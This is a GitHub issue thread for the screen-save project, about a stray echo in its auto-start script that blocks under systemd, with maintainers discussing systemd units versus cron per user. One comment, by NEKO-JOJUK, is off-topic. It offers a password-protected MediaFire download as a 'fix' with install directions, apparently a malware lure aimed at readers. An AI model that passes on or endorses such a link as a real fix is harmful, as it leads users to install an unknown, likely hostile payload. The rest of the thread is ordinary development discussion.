### ISSUE TITLE
Echo in auto-start script

### ISSUE THREAD

**Issue by camlafit** [simonwalz/screen-save#18]
Hello

Working on auto start, I've found an echo in auto-start script
https://github.com/simonwalz/screen-save/blob/main/screen-auto-start#L33

With systemd service it's blocking and would need to remove it. 
As I presume is not a typo , i prefer open an issue to clarify this :)

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by simonwalz** [comment]
Yes, you are right. It has to be removed.

I assume that the screen-auto-start is untested.
Please be aware, that it was intended to start the sessions of one user. When we place it into a systemd unit, we will have to extend it, to create the sessions for all users.

We have to answer questions like:
* How do we find the sessions?
* For which users do we start the sessions?

Shall I adapt it, or do you want to give it a try?

**Comment by camlafit** [comment]
Hello

With systemd / debian packaging it's enough. It's possible to provide a global service at user level. I've followed this way in #10 and cf5e9292c05ad701d40fa632739fb745d54e4e5a

With cron looks more complex. Easier way it's to do anything and add an explanation about  how to set @reboot per user. Or maybe we can do a loop to find .screenrc-* backup and restore them.

**Comment by simonwalz** [comment]
I merged https://github.com/simonwalz/screen-save/pull/21 (and thus this issue was closed automatically).

I like the idea with the systemd unit instead of using cron. I would suggest collecting all save screen sessions in one seperate folder (`SAVE_DIR`), as suggested in https://github.com/simonwalz/screen-save/issues/20#issuecomment-2322900980.
